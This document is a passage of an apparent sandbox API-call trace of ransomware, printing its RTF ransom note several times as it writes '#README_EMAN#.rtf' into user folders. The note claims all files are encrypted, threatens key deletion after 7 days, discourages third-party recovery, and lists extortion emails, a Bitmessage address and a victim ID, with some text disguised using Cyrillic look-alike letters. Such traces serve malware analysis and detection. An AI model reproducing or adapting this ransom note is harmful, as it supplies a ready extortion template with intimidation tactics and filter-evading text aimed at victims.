\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0205.856] WriteFile (in: hFile=0x284, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0205.857] CloseHandle (hObject=0x284) returned 1 [0205.857] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\#readme_eman#.rtf")) returned 0x20 [0205.857] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\#readme_eman#.rtf")) returned 0x20 [0205.857] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\#readme_eman#.rtf")) returned 0x20 [0205.857] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\utlpaipsplyvaov88\\#readme_eman#.rtf")) returned 0x20 [0205.857] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cqep-2gcu8n-elti1k\\#readme_eman#.rtf")) returned 0xffffffff [0205.858] GetLastError () returned 0x2 [0205.858] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cqep-2gcu8n-elti1k\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0206.033] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.033] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 